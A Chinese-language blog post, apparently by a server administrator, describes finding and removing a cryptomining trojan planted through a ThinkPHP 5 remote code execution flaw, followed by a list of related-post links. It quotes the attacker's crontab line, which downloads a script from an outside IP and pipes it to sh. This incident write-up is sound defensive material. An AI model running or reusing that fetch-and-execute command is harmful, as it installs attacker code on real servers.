记一次挂马清除经历:处理一个利用thinkphp5远程代码执行漏洞挖矿的木马
昨天发现 一台服务器突然慢了 top 显示 几个进程100%以上的cpu使用
执行命令为 :
/tmp/php -s /tmp/p2.conf
基本可以确定是被挂马了
下一步确定来源
last 没有登陆记录
先干掉这几个进程,但是几分钟之后又出现了
先看看这个木马想干什么吧
netstat 看到 这个木马开启了一个端口和国外的某个ip建立了连接
但是tcpdump了一小会儿 没有发现任何数据传递
这他是想干啥?
继续查看日志吧
在cron日志中发现了www用户 有一个crontab定时操作 基本就是这个问题了
wget -q -O - http://83.220.169.247/cr3.sh | sh > /dev/null 2>&1
顺着下载了几个问题,看了看 应该是个挖矿的木马程序
服务器上的www用户 是安装 lnmp 创建的,看了来源很可能就是web漏洞了。
再看/tmp下的php的权限 就是www的
查看 lnmp下几个站的日志 发现是利用 thinkphp 5最近爆出的远程代码执行漏洞
漏洞细节:https://nosec.org/home/detail...
修复一下问题解决
但是 这个站点是测试站点 端口监听的是 8083 ,难道现在黑客能开始嗅探非常规端口了?
相关推荐
newfarhui 2020-02-22
xiaouncle 2020-01-01
xhqiang 2019-10-28
SugarNMS 2019-10-27
gongruitao 2019-10-24
Albertsong 2019-07-05
duwang0 2017-06-25
Jantywei 2016-02-11
duwang0 2015-12-08
bxqybxqy 2016-03-16
VipWangQiaoqiao 2008-10-07
李世平 2018-04-02
香帅 2018-08-28
xiaozhuawangzi 2018-07-19
信息安全 2018-04-26
xrslt 2018-03-29
jimforum 2018-02-03
大唐帝国前营 2018-01-19
香帅 2017-10-19